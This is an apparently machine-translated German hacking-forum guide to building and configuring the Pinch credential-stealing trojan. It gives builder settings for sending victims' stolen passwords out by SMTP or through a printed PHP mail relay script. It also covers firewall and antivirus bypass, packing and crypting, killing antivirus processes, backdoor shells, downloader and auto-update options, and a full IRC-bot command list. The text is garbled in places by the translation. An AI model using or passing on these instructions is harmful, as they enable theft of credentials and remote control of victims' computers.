This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen die Seife, wir verwenden BrutusAET2


MATERIAL IST FÜR WESENTLICHE ZWECKE POSITIONIERT. DER AUTOR ÜBERNIMMT KEINE VERANTWORTUNG


-------------------------------------------------- ----------------
Teil 1. alt, aber nützlich. für Prise 1

************************
Pinch Instruction 1.0
************************

=====
Intro
=====

Bitte wundern Sie sich nicht, dass ich beschlossen habe, einen ähnlichen Artikel zu schreiben (Artikel für lamerzzz). Tatsache ist, dass in meinem Forum (http://forum.web-hack.ru) ungefähr alle drei Tage ein Thema erstellt wird, z. B. "Wie konfiguriere und verwende ich Pinch richtig?", "Wie verwende ich Pinch?" usw.

============
Die Möglichkeiten
============

Dieser Trojaner war 2003/2004 weit verbreitet. Alles dank der Fähigkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM & RQ, The Bat !, The Bat! 2, Outlook / Outlook Express, IE-Autovervollständigung & geschützte Sites & ftp (9x /) ME / 2000 / XP), FAR Manager (FTP), Win / Total Commander (FTP), RAS (9x / Me / 2k / XP unterstützt), geringes Gewicht, Open Source und die einfache Erstellung eines Trojs für eine bestimmte Aufgabe. Der Trojaner hat folgende Eigenschaften:

- Senden Sie die Computerkonfiguration des Opfers: Betriebssystem, Betriebssystem, CPU, Festplatte, protokollierter Benutzer, Hostname, IP
- Tastaturspion (Key-Log)
- Remote-Konsole
- Firewall-Bypass
- Senden aller Passwörter per E-Mail über einen SMTP-Server
- Verschlüsselung gestohlener Mail-Passwörter
- Trojaner nach dem Start automatisch löschen
- HTML / Textberichte
- Dateigröße ca. 10Kb
- Modulares System
- Und vieles mehr...

Der Trojaner wurde von coban2k (http://www.cobans.net) geschrieben, einer ziemlich bekannten Person in der Welt des ICQ-Hacking. Aufgrund von Problemen beim Hosting bezüglich der Speicherung des Trojaners auf seinem Server musste der Autor diese Erstellung von seiner Site entfernen. Leider finden fast alle Antivirenprogramme diesen Trojaner bereits und können nur mit einem Opfer gepaart werden, das kein Antivirenprogramm hat.

=============
Paketpaket
=============

Die folgenden Ordner und Dateien sind mit einem Trojaner im Archiv (pinch_1.0.zip) enthalten:

\ PinchBuilder.exe - Assistent zum Erstellen eines Trojaners
\ Parser.exe - ein Programm zum Entschlüsseln verschlüsselter E-Mails mit Passwörtern
\ readme.txt - kein Kommentar
\ Pinch \ - der Hauptordner mit dem ASM-Quellcode des Trojaners und des Compilers
\ Quellen \ - andere Quellen
\ TB! 2 Plugin (Auto-Parser) \ - der Ordner mit dem Plugin für The Bat 2!, Der verschlüsselte Nachrichten mit Passwörtern entschlüsselt, die in Ihrer Mailbox ankommen
\ Sources \ Script \ - PHP-Skript, über das Passwörter gesendet werden, wenn während der Kompilierung die entsprechende Option ausgewählt wird (weiterlesen)

=================
Wir stellen drei zusammen
=================

Das Kit enthält einen speziellen Assistenten (PinchBuilder.exe), der einen Trojaner gemäß Ihren Anforderungen erstellt und den Trojaner direkt auf Ihrem Computer kompiliert. Das Programm verfügt über zwei Hauptregisterkarten: Kompilieren und Entschlüsseln. Der erste dient zum Erstellen eines Trojaners und der zweite zum Entschlüsseln von Kennwörtern (tatsächlich ist diese Registerkarte das Ergebnis der Datei Parser.exe). Es folgen drei Unterregisterkarten: SMTP, HTTP und FILE. Sie geben die Option zum Anzeigen von Passwörtern an. Lassen Sie uns jedes genauer analysieren:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Serverdomäne eingegeben haben, klicken Sie auf Auflösen, damit die Serverdomäne die Form einer IP-Adresse hat. Geben Sie als Nächstes in den Feldern Von und Bis Ihre Seife an. Die Schaltfläche Testmassage senden wird zum Testen des Sendens von Briefen über die von Ihnen festgelegten Einstellungen verwendet. Ich empfehle dringend, es zu verwenden. Wenn der Brief nicht ankommt, bedeutet dies, dass beim Senden einige Probleme auftreten (die Firewall ist aktiviert, schlechtes SMTP, hat nicht auf Auflösen geklickt usw.).

Ich möchte darauf hinweisen, dass die meisten Anbieter in letzter Zeit auf ein System umsteigen, mit dem ihre Kunden NUR Briefe von ihrem SMTP-Server senden können. In solchen Fällen empfehle ich die Methode zum Senden von Briefen über HTTP.

====
HTTP
====

Wir laden die Datei \ Sources \ Script \ view.php auf einen Server hoch, der PHP-Skripte unterstützt und die Funktion mail () ausführt. Geben Sie als Nächstes im URL-Feld den Pfad zu diesem Skript an (z. B. http://www.xss.ru/pinch.php). Geben Sie im Feld Betreff den Namen des Themas an, mit dem Briefe gesendet werden sollen. Das Feld Status check str sollte eine Zeile enthalten, die vom Skript nach dem Laden ausgegeben wird. In dem Skript, das mit den drei geliefert wird, ist es wichtig: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, versucht er, jede Minute eine E-Mail über dieses Skript zu senden, bis er als Antwort eine Zeile aus dem Feld Status check str erhält. Ich empfehle, dass Sie das Skript nicht aus dem Standardpaket verwenden, sondern von mir geschrieben:

<html> <body>
<? php
// Autor: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) und isset ($ subject) und isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Er macht fast das Gleiche, ist aber korrekter geschrieben. Ein großes Plus bei der Verwendung dieser Methode zum Senden von Passwörtern ist die Tatsache, dass Sie Passwörter unter Umgehung der Firewall senden können. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Außenpostenprotokoll zum Zeitpunkt des Sendens des Passworts über ein Skript von meiner Website:

Prozessname: iexplorer.exe
Protokoll: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder hat verstanden, wer nicht im Tank ist =) Außerdem kann ich anhand der Pluspunkte die Möglichkeit hervorheben, verschlüsselte Briefe auf Ihrer Website zu schreiben und sie nicht an Seife zu senden. die Möglichkeit, die Seife zu ändern, an die Passwörter gesendet werden, falls sie gelöscht werden; während der Massenverteilung von Trojs (so dass Passwörter auch von Anbietern gesendet werden können, bei denen der Zugriff auf alle SMTP-Server mit Ausnahme dieser deaktiviert ist)

====
DATEI
====

Auf dieser Registerkarte wird der Pfad zu der Datei festgelegt, in der alle Kennwörter gespeichert sind. Schreiben Sie dazu im Feld Pfad den Pfad in die Datei (z. B. C: \ password.txt).

=================
Compiler-Optionen
=================

In diesem Bereich ist alles klar, hier müssen Sie nur die Kästchen ankreuzen, wo Sie es brauchen. Beachten Sie das Feld Symbol hinzufügen. Es gibt den Pfad zu dem Symbol an, mit dem der kompilierte Trojaner angezeigt wird. Ich möchte darauf hinweisen, dass ich auf meinem System (Windows XP) die Trojs mit dieser aktivierten Option immer noch nicht kompilieren konnte und deaktiviert werden musste.

Geben Sie in den Feldern Protokoll die Methode an, mit der Kennwörter gesendet werden (SMTP / HTTP / FILE). Klicken Sie anschließend auf die Schaltfläche Kompilieren, und die Kompilierung des Trojaners sollte beginnen. Dieser wird mit dem Assistenten im Hauptordner gespeichert, um ihn zu erstellen.

=====================
Passwortentschlüsselung
=====================

Nehmen wir an, Sie haben es geschafft, diese drei zum Lamer zu bringen, und Sie haben die Passwörter aus dem Auto des Opfers erhalten. Tatsache ist, dass beim Senden die Passwörter verschlüsselt sind und zuerst entschlüsselt werden müssen (wenn Sie kein spezielles Plug-In für TheBat haben! Wie oben beschrieben). Kopieren Sie den Text mit den verschlüsselten Passwörtern in die Zwischenablage, öffnen Sie Parser.exe (oder die Registerkarte Entschlüsseln in PinchBuilder.exe) und klicken Sie im Kontextmenü auf das Element Prozessdaten (oder drücken Sie einfach die Tastenkombination Alt + C). Als nächstes gibt Ihnen das Programm alle dem Opfer gestohlenen Daten in einer bequemen Form. Dann können Sie sie speichern oder drucken.

===========
Fazit
===========

Ich möchte Sie warnen, dass Sie bei der Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuchs der Russischen Föderation fallen und ernsthaft bestraft werden können ;-) Ich (der Autor des Artikels) übernehme keine Verantwortung für den Schaden, der einer Person nach dem Lesen meines Artikels entstehen kann.


----------------------------------------

Teil 2. Pinch-Anweisung 2.58

Ein kurzer Artikel über elementares Pinch-Tuning. Beurteilen Sie nicht streng, sondern kritisieren Sie mit ganzem Mund. Pinch 2.58 Anpassungsartikel.

Ich denke, dass es kein Problem mit dem Riss gibt, da es eine detaillierte Hilfe gibt und sogar ein Video beigefügt ist. Ich möchte zeigen, wie das Triple im Builder konfiguriert wird:

SMTP-Eigenschaften
Server (geben Sie in Ihrem Fall smtp.mail.ru ein), dann müssen Sie auf Auflösen klicken, um es in IP zu konvertieren (übrigens. Alle Betrugsfälle müssen mit dem Internet verbunden sein).

Port - so lassen wie es ist

Protokoll - die Wahl, wie der Bericht über SMTP, HTTP (über PHP) und DATEI abgerufen wird - auf dem Computer gespeichert. Gleichnamige Schaltflächen (SMTP, HTTP, FILE) sind Protokolleinstellungen. In diesem Fall interessieren wir uns jedoch für SMTP und haben es bereits konfiguriert.

Schaltfläche TestSend sendet eine Testnachricht an die Mail.

Registerkarte PWD - Passwörter aus den aufgelisteten Programmen. Das Element ENABLE PWD beim Deaktivieren von Berichten enthält keine Kennwörter.
Dohle Senden Sie keinen alten Bericht - senden Sie keine alten Berichte.
Jackdaws Encrypt und Packing sind miteinander verbunden. FSG, UPX, MEW Wahl der Verpackungsmethode.

Registerkarte RUN - Auswahl der Startmethoden. Ich denke du wirst es verstehen. Build as .... standart, DLL, Undelate Service. In einen Ordner verschieben ..... entweder Sie geben einen der Systemordner an oder wählen ihn aus. Auf der rechten Seite befindet sich die Spalte "Werte". Ich habe sie nicht berührt und mir ehrlich gesagt vage vorgestellt, warum dies so ist. Unten rechts - Windows-Firewall (SP2) umgehen - System-Firewall in SP2 umgehen (soweit ich weiß, beginnt dieser Mechanismus wie iexplorer.exe)

Registerkarte " SPY" - einige zusätzliche Berichte - hat bei mir nicht funktioniert. Screen Spy Fad - einen Screenshot machen, aber wieder hat es bei mir nicht funktioniert (srkin wurde gesendet, aber es war leer)

Registerkarte NET - Ich habe es nicht verwendet. Es wurde entwickelt, um:
1. Öffnen Sie einen beliebigen Port des infizierten Computers und erhalten Sie dementsprechend Zugriff darauf (ich rate Ihnen dringend, ihn nicht zu verwenden. Wenn Sie ihn nicht verschlüsseln, wenn Sie erwischt werden, raten Sie selbst, was passieren wird ...).
2. Downloader - Zeigt einen direkten Link zu einer Datei an, die heruntergeladen und gestartet werden soll (schätzen Sie, welche Kosten Ihrem Feind entstehen, wenn er Verkehr hat ......)))
3. AutoUpdate - Auto-Update - Der Troy lädt nach Abschluss der Arbeiten seine Kopie herunter und löscht dann beim nächsten Start des Systems automatisch eine neue Kopie (dies dient der Zuverlässigkeit, damit sie nicht gefunden wird).

BD- Registerkarte (Hintertür) - Die Konsole öffnet eine Shell am ausgewählten Port und steuert über Telnet (telnet.exe) oder alternative Programme. (Ich habe es nicht selbst versucht)

Die Registerkarte ECT - Kleben mit einer beliebigen Datei sowie Festlegen des Symbols ... Sie können dies auch tun, damit eine Nachricht angezeigt wird ... Aber etwas funktioniert nicht ...

Registerkarte "TÖTEN" - Beenden eines beliebigen Prozesses (Sie können auch versuchen, das Antivirenprogramm abzutöten), z. B. "Spidernt" - und dann wird der DrWEB-Monitor ausgeschaltet (ich warne Sie, ich habe es noch nicht getan, aber ich werde es versuchen).

Registerkarte " IE" - Installieren Sie Ihre Startseite in Ihrem Browser. Hinzufügen einer Seite zu Favoriten ....

Registerkarte "WURM" - nehmen Sie, ich weiß nicht ... .....

Registerkarte IRC-Bot - Zugriff auf einen Computer über IRC:
.login Autorisierung
.die - Bot herunterfahren
.download - Laden Sie eine Datei von der URL herunter
.httpd - Öffnen Sie den Zugriff auf die Datei über http an einem bestimmten Port
.killthread - Abschluss einer bestimmten Aufgabe
.proxy - Öffnen von sox4 mit am ausgewählten Port mit der ausgewählten ID
.raw - Senden von Rohtext an diesen IRC-Server
.entfernen - Selbstentfernung
.neustart - Neustart
.run - Befehle ausführen
.scan - IP-Adressen nach bestimmten offenen Ports durchsuchen
.shell - Öffnen einer Shell an einem bestimmten Port (nicht in 95/98 / ME)
.status - Version, IP, Startdatum anzeigen
.threads - Aktive Aufgaben anzeigen
.update - Bot-Selbstaktualisierung von einer speziellen URL
.visit - Besuch der ausgewählten URL ausgeblendet
.url - Besuchen Sie die ausgewählte URL offen
.link - zu den Favoriten hinzufügen
.sp - Start machen
.msg - Nachricht (Messagebox)

Das ist wie alles ... Sie drücken COMPILE und ein Triple erscheint in Ihrem Build-Ordner ...

VIEL GLÜCK !!!!!

PS Dies ist wie alles zur Überprüfung geschrieben und der Autor trägt keine Verantwortung für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Kryptofunktionen:
Verwendeter Polymer-Kryptor
KIS-Bypass und Außenposten (einschließlich der neuesten Versionen)
Selbstentfernung
Größenreduzierung (Normale Prise wird um 3-6kb reduziert, Lader-Zupacha um 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~